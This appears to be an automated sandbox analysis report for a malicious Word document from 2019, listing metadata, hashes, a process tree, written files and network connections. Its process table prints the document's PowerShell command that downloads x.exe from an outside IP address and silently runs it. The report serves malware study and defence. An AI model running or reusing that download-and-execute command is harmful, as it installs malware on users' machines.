File name: | 99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f40b74d0809.doc |
Full analysis: | https://app.any.run/tasks/4fb6e570-3734-402d-9dd5-8b78c333878d |
Verdict: | Malicious activity |
Analysis date: | July 11, 2019, 14:20:10 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: jnmnGw, Template: Normal, Last Saved By: Windows User, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Apr 13 13:19:00 2018, Last Saved Time/Date: Fri Apr 13 13:19:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | 16BA8F5D604B4B9A366AE2D5B2107E68 |
SHA1: | 878F05A0DDC78DB92CD844B5D13BE93E7B25F343 |
SHA256: | 99EB1D90EB5F0D012F35FCC2A7DEDD2229312794354843637EBB7F40B74D0809 |
SSDEEP: | 6144:FvLzpvvAi+VLE5DnxWCDWSQB2Zye7+rXMl:pzpvv+pE5DxWskrX |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 14 |
CharCountWithSpaces: | 1 |
Paragraphs: | 1 |
Lines: | 1 |
Bytes: | 11000 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 1 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2018:04:13 12:19:00 |
CreateDate: | 2018:04:13 12:19:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Windows User |
Template: | Normal |
Comments: | - |
Keywords: | - |
Author: | jnmnGw |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3284 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f40b74d0809.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1944 | powershell.exe -w 1 (New-Object System.Net.WebClient).DownloadFile('http://185.189.58.222/x.exe',([System.IO.Path]::GetTempPath()+'\PHfW.exe'));powershell.exe -w 1 Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\PHfW.exe'); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3284 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD3B1.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1944 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5LDQFMD5DJTO809NU9OY.temp | — | |
MD5:— | SHA256:— | |||
1944 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:E4D9C442DD447A8FA05F9CFE88FCBB69 | SHA256:EDD7D7597C6C79A1DFD3229A1FA23433329B1D8399EB558623FFF948D3BB4036 | |||
3284 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f40b74d0809.doc | pgc | |
MD5:6032C47114E145B6716461DA588CF850 | SHA256:EB25F96C3FA164F932E1CBC6697027AAB54516A6872A292D9C89EC2470DE616F | |||
1944 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFcdce8.TMP | binary | |
MD5:E4D9C442DD447A8FA05F9CFE88FCBB69 | SHA256:EDD7D7597C6C79A1DFD3229A1FA23433329B1D8399EB558623FFF948D3BB4036 | |||
3284 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:F3BA9329A8785DC87062CB21BF79B812 | SHA256:065EDFB6487B46A8574044A100B599C443DE75215A1D4C1B09AE3B34329F3D1B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1944 | powershell.exe | GET | — | 185.189.58.222:80 | http://185.189.58.222/x.exe | GB | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1944 | powershell.exe | 185.189.58.222:80 | — | — | GB | malicious |